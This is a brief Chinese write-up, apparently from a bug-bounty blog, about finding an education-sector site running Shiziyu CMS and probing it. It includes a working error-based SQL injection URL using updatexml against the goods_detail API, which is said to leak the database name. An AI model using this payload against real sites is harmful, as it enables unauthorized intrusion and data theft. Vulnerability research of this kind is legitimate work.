对于edu来说,是新人挖洞较好的平台,本次记录一次走运的捡漏
0x01 前景
在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点
确认目标身份(使用的quake进行然后去ipc备案查询)
网站后台很像cms搭建的,在查看网站时发现
/seller.php?s=/Public/login
狮子鱼cms的特征
直接去百度一手,发现有个SQL注入还有其他的,打算一个一个尝试看看
0x02 尝试挖掘
payload
https://www.xxx.com/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
成功爆破出数据库名
没看够~?欢迎关注!